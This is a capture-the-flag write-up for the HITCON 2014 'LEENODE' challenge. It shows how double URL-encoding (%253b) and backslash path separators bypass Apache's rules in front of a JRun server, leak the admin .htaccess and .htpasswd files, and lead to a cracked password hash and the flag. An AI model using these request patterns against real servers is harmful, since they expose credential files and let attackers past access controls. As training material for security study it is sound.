= LEENODE =
 1. Perhaps, what we need to do is to access to /admin/
 1. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp was forwarded to JRun server.
  * http://203.66.57.98/a.jsp
 1. I found a vulnerability information of JRun
  * http://www.kb.cert.org/vuls/id/977440
 1. [[http://203.66.57.98/a;.jsp]] was 500 Internal Server Error. It is interesting. by Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] was /a and 404 Error by JRun. It is very interesting.
 1. Can I get /.htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: Answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognized backslash as directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] was handled as /a by JRun.
 1. Finally, I got the /admin/.htaccess via [[http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp]] and /admin/.htpasswd via [[http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp]]. {{{
AuthName "Restricted Area" 
AuthType Basic 
AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd 
AuthGroupFile /dev/null 
require valid-user
}}}{{{
hitc0n_1een0de:nlGc3XNhkrL1o
}}}
 1. Use John. The password was ktw2z. {{{
% john htpasswd
ktw2z            (hitc0n_1een0de)
guesses: 1  time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014)  c/s: 5319K  trying: ktkcK - kk4iT
}}}
 1. There was the flag on [[http://203.66.57.98/admin/thefl4g.txt]]. {{{
The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}
}}}